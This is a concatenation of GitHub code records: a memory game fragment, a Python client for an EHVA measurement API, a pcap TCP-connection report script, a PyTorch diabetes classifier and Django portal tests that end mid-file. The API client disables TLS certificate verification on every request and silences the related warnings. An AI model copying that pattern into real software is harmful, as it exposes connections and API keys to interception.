init)\nl=frame.add_label(\"Moves = 0\")\n\n########\n# Main #\n########\n\n# initialize global variables\ninit()\n\n# register event handlers\nframe.set_mouseclick_handler(mouseclick)\nframe.set_draw_handler(draw)\n\n# get things rolling\nframe.start()\n","repo_name":"hctnm2/OpenSourceEnthusiast","sub_path":"codes/memory_game.py","file_name":"memory_game.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"40"} +{"seq_id":"7759803505","text":"import urllib.parse\n\nimport requests\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\nclass EhvaApi:\n \"\"\"EHVA API class. performs requests to the EHVA REST server\"\"\"\n\n API_URL = \"api/v1\"\n\n def __init__(self, host_url, api_key):\n\n self.host_url = host_url\n self.base_url = urllib.parse.urljoin(host_url, self.API_URL)\n self.api_key = api_key\n self.request_headers = {\"ApiKey\": self.api_key}\n\n def __repr__(self):\n return f\"EhvaApi hosted on {self.host_url}\"\n\n def request_wrapper(func):\n \"\"\"This is a wrapper to perform the requests and assess their success\"\"\"\n\n def f(*args, **kwargs):\n try:\n response = func(*args, **kwargs)\n\n if response.ok:\n return response.json()\n else:\n return f\"{response.reason}: {response.text}\"\n\n except Exception as ex:\n raise ConnectionError(ex)\n\n return f\n\n @request_wrapper\n def _perform_get(self, route, params=None):\n return requests.get(\n self.base_url + route,\n params=params,\n headers=self.request_headers,\n verify=False,\n )\n\n @request_wrapper\n def _perform_post(self, route, params=None, data=None):\n return requests.post(\n self.base_url + route,\n params=params,\n headers=self.request_headers,\n data=data,\n verify=False,\n )\n\n @property\n def wafers(self):\n \"\"\"Returns a list of all wafers\"\"\"\n return self._perform_get(\"/components/wafers\")\n\n @property\n def reticles(self):\n \"\"\"Returns a list of all reticles\"\"\"\n return self._perform_get(\"/components/reticles\")\n\n @property\n def dies(self):\n \"\"\"Returns a list of all dies\"\"\"\n return self._perform_get(\"/components/dies\")\n\n @property\n def circuits(self):\n \"\"\"Returns a list of all circuits\"\"\"\n return self._perform_get(\"/components/circuits\")\n\n @property\n def optical_ports(self):\n \"\"\"Returns a list of all optical ports\"\"\"\n return self._perform_get(\"/components/opticalports\")\n\n @property\n def electrical_ports(self):\n \"\"\"Returns a list of all electrical ports\"\"\"\n return self._perform_get(\"/components/electricalports\")\n\n @property\n def station_configurations(self):\n \"\"\"Returns a list of all station configs\"\"\"\n return self._perform_get(\"/stationconfigurations\")\n\n @property\n def measurement_sequences(self):\n \"\"\"Returns a list of all measurement sequences\"\"\"\n return self._perform_get(\"/measurementsequences\")\n\n def run_sequence(\n self,\n sequence_name,\n sequence_version,\n station_config: dict = None,\n dut: dict = None,\n debug_mode=False,\n nosave_mode=False,\n ):\n \"\"\"Run an existing Measurement Sequence\n\n Args:\n sequence_name (str): Name of the Sequence to be run\n sequence_version (str): Version of the sequence to be run\n station_config (dict, optional): The Station Config to be used. Must be a dict with string fields 'name' and 'version'.\n dut (dict, optional): Device Under Test to be used. 
Must be a dict containing fields 'wafer', 'reticle', 'die', 'circuit', 'optical port', 'electrical port'.\n debug_mode (bool, optional): Whether to run in debug (slowed-down) mode.\n nosave_mode (bool, optional): Whether to prevent saving to database. Useful for testing and debugging.\n\n Returns:\n dict: A dictionary containing all Sequence Variables in the form (Name, Value).\n \"\"\"\n\n # Verify Measurement Sequence\n matching_sequence = [\n s\n for s in self.measurement_sequences\n if s[\"name\"] == sequence_name and s[\"version\"] == sequence_version\n ]\n if not matching_sequence:\n raise ValueError(\n f\"The Measurement Sequence with name '{sequence_name}' and version '{sequence_version}' could not be found.\"\n )\n sequence_id = matching_sequence[0][\"id\"]\n\n # Make Station config verifications\n config_id = None\n if station_config is not None:\n if any(key not in station_config for key in [\"name\", \"version\"]):\n raise ValueError(\n \"argument station_config must contain 'name' and 'version' fields.\"\n )\n\n config = [\n c\n for c in self.station_configurations\n if c[\"name\"] == station_config[\"name\"]\n and c[\"version\"] == station_config[\"version\"]\n ]\n if not config:\n raise ValueError(\n f\"Station Config with name '{station_config['name']}' and version '{station_config['version']}' was not found.\"\n )\n config_id = config[0][\"id\"]\n\n # Make DUT verifications\n optical_port_id = None\n electrical_port_id = None\n if dut is not None and (\n dut[\"optical port\"] is not None or dut[\"electrical port\"] is not None\n ):\n\n if any(\n key\n not in [\n \"wafer\",\n \"reticle\",\n \"die\",\n \"circuit\",\n \"optical port\",\n \"electrical port\",\n ]\n for key in dut\n ):\n raise ValueError(\n \"argument 'dut' must contain the following fields: 'wafer', 'reticle', 'die', 'circuit', 'optical port', 'electrical port'.\"\n )\n\n try:\n wafer = [w for w in self.wafers if w[\"name\"] == dut[\"wafer\"]][0]\n reticle = [\n r\n for r in self.reticles\n if r[\"name\"] == dut[\"reticle\"] and r[\"waferId\"] == wafer[\"id\"]\n ][0]\n die = [\n d\n for d in self.dies\n if d[\"name\"] == dut[\"die\"] and d[\"reticleId\"] == reticle[\"id\"]\n ][0]\n circuit = [\n c\n for c in self.circuits\n if c[\"name\"] == dut[\"circuit\"] and c[\"dieId\"] == die[\"id\"]\n ][0]\n optical_port_id = [\n p[\"id\"]\n for p in self.optical_ports\n if p[\"name\"] == dut[\"optical port\"]\n and p[\"componentId\"] == circuit[\"id\"]\n ]\n electrical_port_id = [\n p[\"id\"]\n for p in self.electrical_ports\n if p[\"name\"] == dut[\"electrical port\"]\n and p[\"componentId\"] == circuit[\"id\"]\n ]\n\n except Exception:\n raise ValueError(\n f\"The provided DUT could not be found, please review hierarchy: {dut}.\"\n )\n\n # Perform request\n params = {\n \"sequenceId\": sequence_id,\n \"stationConfigurationId\": config_id,\n \"opticalPortsId\": optical_port_id,\n \"electricalPortsId\": electrical_port_id,\n \"isDebugMode\": debug_mode,\n \"isNoSaveMode\": nosave_mode,\n }\n\n return self._perform_get(\"/runtime/runexisting\", params=params)\n","repo_name":"EHVAAutomation/ehva-python","sub_path":"ehva/ehva_api.py","file_name":"ehva_api.py","file_ext":"py","file_size_in_byte":7522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"16544337510","text":"import dpkt\nimport socket\nimport datetime\nimport argparse\n\n# Defines a unique key representing a set of (ip:port,ip:port)\ndef getConnectionKey(source_port, dest_port, source_ip, dest_ip):\n 
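\"\"\"Build a direction-independent key: the lexicographically smaller ip:port pair always comes first, so packets travelling in either direction map onto the same connection entry.\"\"\"\n 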
connection_key = \"\"\n if(source_ip < dest_ip):\n connection_key += source_ip + \":\"\n connection_key += str(source_port) + \":\"\n connection_key += dest_ip + \":\"\n connection_key += str(dest_port)\n else:\n connection_key += dest_ip + \":\"\n connection_key += str(dest_port) + \":\"\n connection_key += source_ip + \":\"\n connection_key += str(source_port)\n return connection_key\n\ndef reportFromCapFile(filename):\n f = open(filename, 'rb')\n pcap = dpkt.pcap.Reader(f)\n\n connections = {}\n\n for ts, buf in pcap:\n # go down the layers of the network stack\n ethernet_obj = dpkt.ethernet.Ethernet(buf)\n ip_obj = ethernet_obj.data\n tcp_obj = ip_obj.data\n\n source_port = tcp_obj.sport\n dest_port = tcp_obj.dport\n\n source_ip = socket.inet_ntoa(ip_obj.src)\n dest_ip = socket.inet_ntoa(ip_obj.dst)\n\n num_data_bytes = len(tcp_obj.data)\n\n seq_num = tcp_obj.seq\n ack_num = tcp_obj.ack\n\n recv_window_size = tcp_obj.win\n\n # connection data needed for a packet\n connection_data = {\n 'ts' : ts,\n 'source_port' : source_port,\n 'dest_port' : dest_port,\n 'source_ip' : source_ip,\n 'dest_ip' : dest_ip,\n 'flags' : tcp_obj.flags,\n 'data_bytes' : num_data_bytes,\n 'seq_num' : seq_num,\n 'ack_num' : ack_num,\n 'recv_window_size' : recv_window_size\n }\n connection_key = getConnectionKey(source_port, dest_port, source_ip, dest_ip)\n\n # sort packets into dictionary where each value is a list of packets\n if(connection_key not in connections):\n connections[connection_key] = []\n connections[connection_key].append(connection_data)\n\n num_connections = len(connections)\n\n counter = 1\n complete_connections = 0\n reset_connections = 0\n\n max_complete_time = 0\n min_complete_time = 10000000.0\n complete_time_sum = 0\n\n max_rtt = 0\n min_rtt = 100000000.0\n rtt_sum = 0\n rtt_count = 0\n\n max_packet_count = 0\n min_packet_count = 10000000.0\n packet_count_sum = 0\n\n max_recv = 0\n min_recv = 100000000.0\n recv_sum = 0\n recv_count = 0\n\n # loop over connections and then packets in each connection\n for key, packets in connections.items():\n print(\"==============================================================\")\n print(\"Connection \", counter)\n counter += 1\n\n syn_count = 0\n fin_count = 0\n rst_count = 0\n for packet in packets:\n flags = packet['flags']\n syn_flag = ( flags & dpkt.tcp.TH_SYN ) != 0\n fin_flag = ( flags & dpkt.tcp.TH_FIN ) != 0\n ack_flag = ( flags & dpkt.tcp.TH_ACK ) != 0\n rst_flag = ( flags & dpkt.tcp.TH_RST ) != 0\n\n if(syn_flag):\n syn_count += 1\n if(fin_flag):\n fin_count += 1\n if(rst_flag):\n rst_count += 1\n\n rst_str = \"\"\n if(rst_count > 0):\n rst_str = \"/R\"\n reset_connections += 1\n print(\"Connection state: \", \"S\", syn_count, \"F\", fin_count, rst_str)\n\n\n connection_complete = (syn_count > 0 and fin_count > 0)\n if not connection_complete:\n print(\"Connection not complete\")\n continue\n\n complete_connections += 1\n print(\"Connection is complete\")\n\n first_syn_i = 0\n last_fin_i = -1\n for i in range(0,len(packets)):\n packet = packets[i]\n flags = packet['flags']\n syn_flag = ( flags & dpkt.tcp.TH_SYN ) != 0\n if(syn_flag):\n first_syn_i = i\n break\n\n for i in reversed(range(0,len(packets))):\n packet = packets[i]\n flags = packet['flags']\n fin_flag = ( flags & dpkt.tcp.TH_FIN ) != 0\n if(fin_flag):\n last_fin_i = i\n break\n\n start_time = packets[first_syn_i]['ts']\n end_time = packets[last_fin_i]['ts']\n duration = end_time - start_time\n print(\"Starting time: \", datetime.datetime.utcfromtimestamp(start_time))\n 
print(\"Ending time: \", datetime.datetime.utcfromtimestamp(end_time))\n print(\"Duration: \", duration, \"seconds\")\n\n max_complete_time = max(duration, max_complete_time)\n min_complete_time = min(duration, min_complete_time)\n complete_time_sum += duration\n\n # ip of the first packet, so we can sort into (this ip) and (not this ip)\n first_ip = packets[0]['source_ip']\n # other info\n first_port = packets[0]['source_port']\n other_ip = packets[0]['dest_ip']\n other_port = packets[0]['dest_port']\n\n packet_count = len(packets)\n\n max_packet_count = max(max_packet_count, packet_count)\n min_packet_count = min(min_packet_count, packet_count)\n packet_count_sum += packet_count\n\n # Calculate how many packets go in each direction\n first_count = 0\n first_data_bytes = 0\n other_data_bytes = 0\n for packet in packets:\n if packet['source_ip'] == first_ip:\n first_count += 1\n first_data_bytes += packet['data_bytes']\n else:\n other_data_bytes += packet['data_bytes']\n\n other_count = packet_count - first_count\n print(\"Packets sent from\",\n first_ip + \":\" + str(first_port),\n \"to\",\n other_ip + \":\" + str(other_port),\n \":\", first_count)\n print(\"Packets sent from\",\n other_ip + \":\" + str(other_port),\n \"to\",\n first_ip + \":\" + str(first_port),\n \":\", other_count)\n print(\"Total packet count: \", packet_count);\n\n print(\"Data bytes sent from\",\n first_ip + \":\" + str(first_port),\n \"to\",\n other_ip + \":\" + str(other_port),\n \":\", first_data_bytes)\n print(\"Data bytes sent from\",\n other_ip + \":\" + str(other_port),\n \"to\",\n first_ip + \":\" + str(first_port),\n \":\", other_data_bytes)\n print(\"Total data bytes: \", first_data_bytes + other_data_bytes);\n\n # map of ack number to ts\n packet_openings = {}\n for packet in packets:\n seq_num = packet['seq_num']\n ack_num = packet['ack_num']\n data_bytes = packet['data_bytes']\n ts = packet['ts']\n packet_openings[seq_num + data_bytes] = ts\n if ack_num in packet_openings:\n rtt_time = ts - packet_openings[ack_num]\n rtt_count += 1\n rtt_sum += rtt_time\n max_rtt = max(max_rtt, rtt_time)\n min_rtt = min(min_rtt, rtt_time)\n # print(\"RTT time: \", rtt_time)\n del packet_openings[ack_num]\n\n for packet in packets:\n recv = packet['recv_window_size']\n recv_count += 1\n recv_sum += recv\n min_recv = min(recv, min_recv)\n max_recv = max(recv, max_recv)\n\n print(\"---------------------------------------------\")\n print(\"Total connections: \", num_connections)\n print(\"Number of complete connections: \", complete_connections)\n print(\"Number of reset connections: \", reset_connections)\n print(\"Number of connections still open: \", num_connections - complete_connections)\n\n mean_complete_time = complete_time_sum / complete_connections\n print(\"Max time open for a complete connection: \", max_complete_time)\n print(\"Min time open for a complete connection: \", min_complete_time)\n print(\"Mean time open for complete connections: \", mean_complete_time)\n\n mean_rtt = rtt_sum / rtt_count\n print(\"Max Round Trip Time: \", max_rtt)\n print(\"Min Round Trip Time: \", min_rtt)\n print(\"Mean Round Trip Time: \", mean_rtt)\n\n mean_packet_count = packet_count_sum / complete_connections\n print(\"Max packet count a complete connection: \", max_packet_count)\n print(\"Min packet count a complete connection: \", min_packet_count)\n print(\"Mean packet count for complete connections: \", mean_packet_count)\n\n mean_recv = recv_sum / recv_count\n print(\"Max recv window size: \", max_recv)\n print(\"Min recv 
window size: \", min_recv)\n print(\"Mean recv window size: \", mean_recv)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Read a cap file and report details of the connections')\n parser.add_argument('filename')\n args = parser.parse_args()\n filename = args.filename\n\n reportFromCapFile(filename)\n","repo_name":"mapld/CSC361","sub_path":"Assign2/CapReport.py","file_name":"CapReport.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19926318493","text":"import numpy as np\r\nimport torch\r\nimport matplotlib.pyplot as plt\r\n\r\n# prepare dataset\r\nxy = np.loadtxt('diabetes.csv', delimiter=',', dtype=np.float32) #delimiter指分隔符逗号;dtype指数据类型,NN常用32(多数显卡支持)\r\nx_data = torch.from_numpy(xy[:, :-1]) # 第一个‘:’是指读取所有行,第二个‘:’是指从第一列��始,最后一列不要\r\nprint(\"input data.shape\", x_data.shape)\r\ny_data = torch.from_numpy(xy[:, [-1]]) # [-1]的中括号使得最后得到的是个矩阵;没有中括号的话就是一个向量\r\n\r\n\r\n# print(x_data.shape)\r\n# design model using class\r\n\r\n\r\nclass Model(torch.nn.Module):\r\n def __init__(self):\r\n super(Model, self).__init__()\r\n self.linear1 = torch.nn.Linear(8, 6) #矩阵实际上就是不同维度空间之间的一个线性变换,或者说是映射。把8维->6维。sigmoid实现非线性\r\n self.linear2 = torch.nn.Linear(6, 4)\r\n self.linear3 = torch.nn.Linear(4, 2)\r\n self.linear4 = torch.nn.Linear(2, 1)\r\n self.sigmoid = torch.nn.Sigmoid()\r\n\r\n def forward(self, x):\r\n x = self.sigmoid(self.linear1(x))\r\n x = self.sigmoid(self.linear2(x))\r\n x = self.sigmoid(self.linear3(x))\r\n x = self.sigmoid(self.linear4(x)) # y hat\r\n return x\r\n\r\n\r\nmodel = Model()\r\n\r\n# construct loss and optimizer\r\n# criterion = torch.nn.BCELoss(size_average = True)\r\ncriterion = torch.nn.BCELoss(reduction='mean')\r\noptimizer = torch.optim.SGD(model.parameters(), lr=0.1)\r\n\r\nepoch_list = []\r\nloss_list = []\r\n# training cycle forward, backward, update\r\nfor epoch in range(1000000): #此处没有用mini-batch\r\n y_pred = model(x_data)\r\n loss = criterion(y_pred, y_data)\r\n # print(epoch, loss.item())\r\n\r\n epoch_list.append(epoch)\r\n loss_list.append(loss.item())\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n if epoch % 100000 == 99999:\r\n y_pred_label = torch.where(y_pred >= 0.5, torch.tensor([1.0]), torch.tensor([0.0]))\r\n\r\n acc = torch.eq(y_pred_label, y_data).sum().item() / y_data.size(0)\r\n print(\"loss = \", loss.item(), \"acc = \", acc)\r\n\r\n\r\nplt.plot(epoch_list, loss_list)\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.show()\r\n","repo_name":"rainbowlzx/lizixuan_graduation-design","sub_path":"11.8-11.14/Lesson7处理多维特征输入.py","file_name":"Lesson7处理多维特征输入.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28737817082","text":"from io import BytesIO\n\nimport pytest\nfrom django.conf import settings\n# from background_task.tasks import tasks\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.flatpages.models import FlatPage\n\nfrom portal import models\nfrom portal.models import Ethnicity, Profile, Subscription\n\npytestmark = pytest.mark.django_db\n\nUser = get_user_model()\n\n\ndef test_template_views(client, admin_user):\n resp = client.get(\"/\")\n assert resp.status_code == 302\n\n fp, _ = FlatPage.objects.get_or_create(\n title=\"About (en)\", url=\"/en/about/\", content=\"THIS IS EN ABOUT PAGE\"\n )\n fp.sites.add(settings.SITE_ID)\n fp.save()\n\n resp = 
client.get(\"/pages/en/about/\")\n assert resp.status_code == 200\n\n resp = client.get(\"/pages/about/\")\n assert resp.status_code == 200\n\n resp = client.get(\"/about\")\n assert resp.status_code == 200\n\n resp = client.get(\"/accounts/login/\")\n assert resp.status_code == 200\n\n resp = client.get(\"/accounts/signup/\")\n assert resp.status_code == 200\n\n client.force_login(admin_user)\n resp = client.get(\"/\")\n assert resp.status_code == 302\n\n resp = client.get(\"/\", follow=True)\n assert (\n b\"Your profile is not completed yet. Please complete your profile or skip it.\"\n in resp.content\n )\n\n Profile.create(user=admin_user, is_completed=True)\n\n resp = client.get(\"/\")\n assert resp.status_code == 200\n\n resp = client.get(\"/onboard\")\n assert resp.status_code == 302\n\n\n# def test_submit_task(client):\n# username, password = \"tester\", \"p455w0rd\"\n# user = User.objects.create_user(username=username, password=password)\n# client.force_login(user)\n# client.get(\"/test_task/TEST-MESSAGE\")\n# assert tasks.run_next_task()\n\n\ndef test_profile(client, admin_user):\n\n username, password = \"tester\", \"p455w0rd\"\n user = User.objects.create_user(username=username, password=password)\n client.force_login(user)\n\n Ethnicity.objects.create(code=\"11111\", description=\"New Zealand European\")\n Ethnicity.objects.create(code=\"12411\", description=\"Polish\")\n Ethnicity.objects.create(code=\"12928\", description=\"Latvian\")\n assert not Profile.objects.filter(user=user).exists()\n resp = client.get(\"/myprofile\", follow=True)\n assert b\"Next\" in resp.content\n\n p = Profile.create(user=user)\n resp = client.get(\"/myprofile\", follow=True)\n assert b\"Primary Language Spoken\" in resp.content\n assert b\"Edit\" in resp.content\n p = Profile.get(user=user)\n assert p.gender == 0 and p.ethnicities.count() == 0\n\n resp = client.post(\n \"/profile/~update\",\n dict(\n gender=1,\n date_of_birth=\"1969-01-01\",\n ethnicities=[\"11111\"],\n education_level=\"7\",\n employment_status=\"3\",\n ),\n follow=True,\n )\n assert resp.status_code == 200\n assert b\"Please read and consent to the Privacy Policy\" in resp.content\n\n models.IwiGroup.create(\n code=\"1111\",\n description=\"TEST\",\n parent_code=\"11\",\n parent_description=\"TEST\",\n definition=\"TEST\",\n )\n resp = client.post(\n \"/profile/~update\",\n dict(\n gender=1,\n date_of_birth=\"1969-01-01\",\n ethnicities=[\"11111\"],\n iwi_groups=[\"1111\"],\n education_level=\"7\",\n employment_status=\"3\",\n is_accepted=True,\n ),\n follow=True,\n )\n assert resp.status_code == 200\n p = Profile.get(user=user)\n assert p.gender == 1 and p.ethnicities.count() == 1\n\n client.force_login(admin_user)\n resp = client.get(f\"/profiles/{user.profile.pk}\")\n assert resp.status_code == 200\n resp = client.get(f\"/profiles/{user.pk}\")\n assert resp.status_code == 404\n\n resp = client.post(\n \"/profile/~create\",\n dict(\n gender=1,\n date_of_birth=\"1969-01-01\",\n ethnicities=[\"11111\"],\n education_level=\"7\",\n employment_status=\"3\",\n ),\n follow=True,\n )\n assert resp.status_code == 200\n assert Profile.objects.filter(user=admin_user).count() == 0\n assert b\"consent\" in resp.content\n\n resp = client.post(\n \"/profile/~create\",\n dict(\n gender=1,\n date_of_birth=\"1969-01-01\",\n ethnicities=[\"11111\"],\n education_level=\"7\",\n employment_status=\"3\",\n is_accepted=True,\n ),\n follow=True,\n )\n assert resp.status_code == 200\n assert admin_user.profile.ethnicities.count() == 1\n\n resp = 
client.post(\n \"/profile/~update\",\n dict(\n gender=2,\n date_of_birth=\"1969-01-01\",\n ethnicities=[\"11111\", \"12411\", \"12928\"],\n education_level=\"7\",\n employment_status=\"3\",\n is_accepted=True,\n ),\n follow=True,\n )\n assert resp.status_code == 200\n assert b\"Position\" in resp.content\n\n # Employments:\n org = models.Organisation.create(name=\"ORG\")\n resp = client.get(\"/profile/employments/\")\n assert not models.Affiliation.where(type=\"EMP\", profile=p).exists()\n resp = client.post(\n \"/profile/employments/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-profile\": p.id,\n \"form-0-org\": org.id,\n \"form-0-type\": \"EMP\",\n \"form-0-role\": \"ROLE\",\n \"form-0-start_date\": \"2020-05-02\",\n \"form-0-end_date\": \"\",\n \"form-0-id\": \"\",\n \"save\": \"Save\",\n },\n follow=True,\n )\n assert models.Affiliation.where(type=\"EMP\", profile=p).exists()\n\n p = admin_user.profile\n assert p.gender == 1 and p.ethnicities.count() == 3\n assert p.ethnicities.count() == 3\n\n # Create and update career stages\n models.CareerStage.create(code=\"R1\", description=\"description #1\", definition=\"definition #1\")\n resp = client.get(\"/profile/career-stages/\")\n assert not models.ProfileCareerStage.where(profile=p).exists()\n resp = client.post(\n \"/profile/career-stages/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-profile\": p.id,\n \"form-0-year_achieved\": 2000,\n \"form-0-career_stage\": \"R1\",\n \"form-0-id\": \"\",\n \"save\": \"Save\",\n },\n follow=True,\n )\n assert models.ProfileCareerStage.where(profile=p).exists()\n\n pcs = models.ProfileCareerStage.get(profile=p)\n resp = client.post(\n \"/profile/career-stages/\",\n {\n \"form-TOTAL_FORMS\": 2,\n \"form-INITIAL_FORMS\": 1,\n \"form-0-profile\": p.id,\n \"form-0-year_achieved\": 2003,\n \"form-0-career_stage\": \"R1\",\n \"form-0-id\": pcs.id,\n \"form-1-profile\": p.id,\n \"form-1-year_achieved\": \"\",\n \"form-1-career_stage\": \"\",\n \"form-1-id\": \"\",\n \"next\": \"Next\",\n },\n follow=True,\n )\n assert models.ProfileCareerStage.where(profile=p, year_achieved=2003).exists()\n\n resp = client.post(\n \"/profile/career-stages/\",\n {\n \"form-TOTAL_FORMS\": 2,\n \"form-INITIAL_FORMS\": 1,\n \"form-0-profile\": p.id,\n \"form-0-year_achieved\": 2003,\n \"form-0-career_stage\": \"R1\",\n \"form-0-id\": pcs.id,\n \"form-0-DELETE\": \"on\",\n \"form-1-profile\": p.id,\n \"form-1-year_achieved\": \"\",\n \"form-1-career_stage\": \"\",\n \"form-1-id\": \"\",\n \"next\": \"Next\",\n },\n follow=True,\n )\n assert not models.ProfileCareerStage.where(profile=p, year_achieved=2003).exists()\n\n # Profile identifier:\n models.PersonIdentifierType.create(\n code=\"11\", description=\"Identifier #11\", definition=\"Identifier #11 definition\"\n )\n resp = client.get(\"/profile/external-ids/\")\n assert not models.ProfilePersonIdentifier.where(profile=p).exists()\n # resp = client.post(\n # \"/profile/external-ids/\",\n # {\n # \"form-TOTAL_FORMS\": 1,\n # \"form-INITIAL_FORMS\": 0,\n # \"form-0-profile\": p.id,\n # \"form-0-code\": 11,\n # \"form-0-value\": \"CODE 11\",\n # \"form-0-id\": \"\",\n # \"save\": \"Save\",\n # },\n # follow=True,\n # )\n # assert models.ProfilePersonIdentifier.where(profile=p).exists()\n\n resp = client.post(\n \"/profile/cvs/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-id\": \"\",\n \"form-0-profile\": p.id,\n \"form-0-owner\": admin_user.id,\n \"form-0-title\": \"TEST\",\n \"form-0-file\": 
BytesIO(b\"TEST\"),\n \"next\": \"Next\",\n },\n follow=True,\n )\n assert resp.status_code == 200\n\n # Accademic records:\n models.FieldOfStudy.create(\n code=\"180101\",\n description=\"test\",\n four_digit_code=\"1010\",\n four_digit_description=\"test\",\n two_digit_code=\"11\",\n two_digit_description=\"test #11\",\n definition=\"test definition\",\n )\n resp = client.get(\"/profile/academic-records/\")\n assert not models.AcademicRecord.where(profile=p).exists()\n resp = client.post(\n \"/profile/academic-records/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-profile\": p.id,\n \"form-0-start_year\": 2020,\n \"form-0-qualification\": 9,\n \"form-0-conferred_on\": \"2020-05-02\",\n \"form-0-discipline\": \"180101\",\n \"form-0-awarded_by\": org.id,\n \"form-0-research_topic\": \"TOPIC\",\n \"form-0-id\": \"\",\n \"next\": \"Next\",\n },\n follow=True,\n )\n # assert models.AcademicRecord.where(profile=p).exists()\n\n # Recognitions:\n a = models.Award.create(name=\"AWARD\")\n resp = client.get(\"/profile/recognitions/\")\n assert not models.Recognition.where(profile=p).exists()\n resp = client.post(\n \"/profile/recognitions/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-profile\": p.id,\n \"form-0-recognized_in\": 2020,\n \"form-0-award\": a.id,\n \"form-0-awarded_by\": org.id,\n \"form-0-amount\": \"9999.99\",\n \"form-0-id\": \"\",\n \"next\": \"Next\",\n },\n follow=True,\n )\n assert models.Recognition.where(profile=p).exists()\n\n # Comleted project\n resp = client.get(f\"/profiles/{user.pk}\")\n\n assert b\"Female\" in resp.content\n assert b\"Latvian\" in resp.content\n\n\ndef test_sentry(client, admin_user):\n\n client.post(\"/accounts/logout/\")\n with pytest.raises(Exception) as excinfo:\n client.get(\"/sentry-debug/\")\n assert \"FAILURE\" in str(excinfo.value)\n\n with pytest.raises(Exception) as excinfo:\n client.get(\"/sentry-debug/TEST\")\n assert \"TEST\" in str(excinfo.value)\n\n client.force_login(admin_user)\n with pytest.raises(Exception) as excinfo:\n client.get(\"/sentry-debug-login/\")\n assert \"FAILURE\" in str(excinfo.value)\n\n with pytest.raises(Exception) as excinfo:\n client.get(\"/sentry-debug-login/TEST123ABC\")\n assert \"TEST123ABC\" in str(excinfo.value)\n\n\ndef test_subscription(client):\n\n resp = client.get(\"/\", follow=True)\n assert b\"Sign up for our newsletter\" in resp.content\n\n assert not Subscription.objects.filter(email=\"test@test.com\", name=\"Tester Testeron\").exists()\n resp = client.post(\n \"/subscribe/\", dict(email=\"test@test.com\", name=\"Tester Testeron\"), follow=True\n )\n assert b\"Verify Your E-mail Address\" in resp.content\n assert Subscription.objects.filter(email=\"test@test.com\", name=\"Tester Testeron\").exists()\n\n resp = client.post(\"/subscribe/\", dict(email=\"test123@test.com\"))\n assert str(Subscription.objects.filter(email=\"test123@test.com\").first()) == \"test123@test.com\"\n\n resp = client.post(\"/subscribe/\", dict(email=\"test42@test.com\", name=\"Tester\"))\n assert str(Subscription.objects.filter(email=\"test42@test.com\").first()) == \"Tester\"\n\n\ndef test_application(client, django_user_model):\n\n r = models.Round.get(title=\"Science Communication Prize 2021\")\n u = django_user_model.objects.create(\n first_name=\"FN123\",\n last_name=\"LN123\",\n username=\"test123\",\n password=\"p455w0rd\",\n email=\"test123@test.com\",\n )\n client.force_login(u)\n Profile.create(user=u)\n org = models.Organisation.create(name=\"ORG\")\n\n resp 
= client.get(f\"/applications/{r.pk}/~create\")\n assert resp.status_code == 200\n assert b\"FN123\" in resp.content\n assert b\"LN123\" in resp.content\n assert b\"test123@test.com\" in resp.content\n\n resp = client.post(\n f\"/applications/{r.pk}/~create\",\n dict(\n title=\"MR\",\n first_name=u.first_name,\n last_name=u.last_name,\n org=org.id,\n position=\"POS\",\n postal_address=\"123 Test Street\",\n city=\"Auckland\",\n postcode=\"1010\",\n daytime_phone=\"0221221442\",\n mobile_phone=\"0221221442\",\n email=u.email,\n ),\n follow=True,\n )\n\n assert models.Application.where(email=u.email).exists()\n\n\ndef test_org_autocompleting(client, user):\n\n models.Organisation.create(name=\"ORG\")\n resp = client.get(\"/autocomplete/org/?q=OR\", follow=True)\n assert b\"Sign in\" in resp.content\n\n client.force_login(user)\n resp = client.get(\"/autocomplete/org/\")\n assert resp.status_code == 200\n assert b\"ORG\" in resp.content\n\n resp = client.get(\"/autocomplete/org/?q=OR\")\n assert resp.status_code == 200\n assert b\"ORG\" in resp.content\n\n # if query is not given select last\n for i in range(1, 20):\n models.Organisation.create(name=f\"ABC #{i}\")\n\n resp = client.get(\"/autocomplete/org/\")\n assert resp.status_code == 200\n assert b\"ORG\" not in resp.content\n\n\ndef test_award_autocompleting(client, user):\n\n models.Award.create(name=\"AWARD\")\n resp = client.get(\"/autocomplete/award/?q=AW\", follow=True)\n assert b\"Sign in\" in resp.content\n\n client.force_login(user)\n resp = client.get(\"/autocomplete/award/\")\n assert resp.status_code == 200\n assert b\"AWARD\" in resp.content\n\n resp = client.get(\"/autocomplete/award/?q=AW\", follow=True)\n assert resp.status_code == 200\n assert b\"AWARD\" in resp.content\n\n # if query is not given select last\n for i in range(1, 20):\n models.Award.create(name=f\"ABC #{i}\")\n\n resp = client.get(\"/autocomplete/award/\")\n assert resp.status_code == 200\n assert b\"AWARD\" not in resp.content\n\n\ndef test_invitation(client, admin_user):\n\n client.force_login(admin_user)\n org = models.Organisation.create(name=\"ORG\")\n\n resp = client.get(\"/invitations/~create\")\n assert resp.status_code == 200\n email = \"test@test.net\"\n\n resp = client.post(\n \"/invitations/~create\",\n dict(email=email, first_name=\"FN\", last_name=\"LN\"),\n follow=True,\n )\n assert resp.status_code == 200\n assert (f\"An invitation was sent to {email}\").encode() in resp.content\n\n assert models.Invitation.where(email=email).exists()\n\n resp = client.post(\n 